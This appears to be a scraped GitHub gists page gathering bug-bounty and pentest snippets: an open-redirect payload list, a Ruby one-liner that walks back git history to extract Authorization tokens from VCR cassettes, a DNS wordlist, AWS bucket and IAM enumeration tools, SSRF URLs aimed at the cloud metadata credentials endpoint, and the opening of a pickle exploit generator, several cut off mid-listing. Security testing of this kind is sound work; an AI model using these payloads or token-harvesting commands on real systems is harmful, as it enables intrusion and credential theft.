💭
Not available because I'm busy

Olivier beg smiegles

/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
@jobertabma
jobertabma / extract-authorization-header-for-vcr.rb
Created August 24, 2017 18:29
One-liner to reset last 1000 git commits and extract the Authorization header to look for tokens from VCR cassettes
# VCR cassettes stored in JSON
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
# VCR cassettes stored in YAML
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
@jhaddix
jhaddix / all.txt
Last active May 12, 2025 12:14
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
@PaulSec
PaulSec / aws_scan.py
Created May 10, 2017 08:05
Quick script to scan for AWS (S3 Buckets) and retrieves bunch of info out of it
import subprocess
import argparse
import re
import sys
import requests
def do_dig(domain):
    command = "dig {} | grep IN".format(domain)
    try:
        output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
@darkarnium
darkarnium / EnumerateIam.md
Last active May 19, 2024 20:31
A quick and VERY dirty IAM enumeration tool.

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.
.0.0
%00/
.000
.0.0.0
0000
00000
000000
00000000
000000000000.cfg
000000000000-directory~.xml
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active May 6, 2025 04:20
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@bl4de
bl4de / pickle_exploit_generator.py
Created January 30, 2016 23:42 — forked from 0xBADCA7/pickle_exploit_generator.py
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run: